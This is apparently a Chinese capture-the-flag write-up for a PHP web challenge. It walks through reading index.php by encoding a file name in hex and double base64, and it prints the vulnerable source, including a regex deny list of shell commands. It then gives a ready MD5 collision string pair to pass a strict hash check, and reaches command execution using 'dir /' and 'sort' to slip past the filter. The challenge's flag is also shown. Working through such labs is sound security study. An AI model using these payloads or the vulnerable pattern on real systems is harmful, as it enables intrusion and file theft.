考点:md5强类型绕过(字符串)
一定要注意分析题目,要提高敏感
源代码最上面是一大串的base64编码后的文字,应该是左上角图像的编码,(这时候就应该考虑到能不能对index.php进行回显)
1.看链接上面有两个参数,一个是img,一个是file
img的值是TXpVek5UTTFNbVUzTURabE5qYz0,
进行base64解码MzUzNTM1MmU3MDZlNjc=;
再进行base64解码3535352e706e67;
16进制转字符串555.png.
同样,对index.php进行编码
字符串转16进制:696e6465782e706870
进行base64编码:Njk2ZTY0NjU3ODJlNzA2ODcw
再进行base64编码:TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
2.进行传参
对网页回显内容进行base64解码,得到如下代码
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixi~ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
?>
<html>
<style>
body{
background:url(./bj.png) no-repeat center center;
background-size:cover;
background-attachment:fixed;
background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
3.进行代码审计,审计后,发现要使代码执行到echo '$cmd':
md5强碰撞的绕过:
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
}
对条件md5($_POST['a']) === md5($_POST['b'])的绕过可以用数组等
对条件(string)$_POST['a'] !== (string)$_POST['b']要求a,b必须是字符串,翻了一下wp,可以记住这两个,当作知识点,以后遇到这种情况可以拿过来使:
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
4.执行echo 'cmd'
补充一个知识点:$(cmd)和'cmd'
$(cmd)和`cmd`的作用是相同的,在执行一条命令时,会先将其中的 ``,或者是$() 中的语句当作命令执行一遍,再将结果加入到原命令中重新执行,例如:
echo `ls`
会先执行 ls 得到xx.sh等,再替换原命令为:
echo xx.sh
因为ls过滤了,所以用dir
查看根目录,令cmd=dir%20/
过滤了cat,利用sort(针对文本文件的内容,以行为单位来排序输出)
5.得到flag{03f67868-e25b-4e62-aedc-05cf3bcc8559}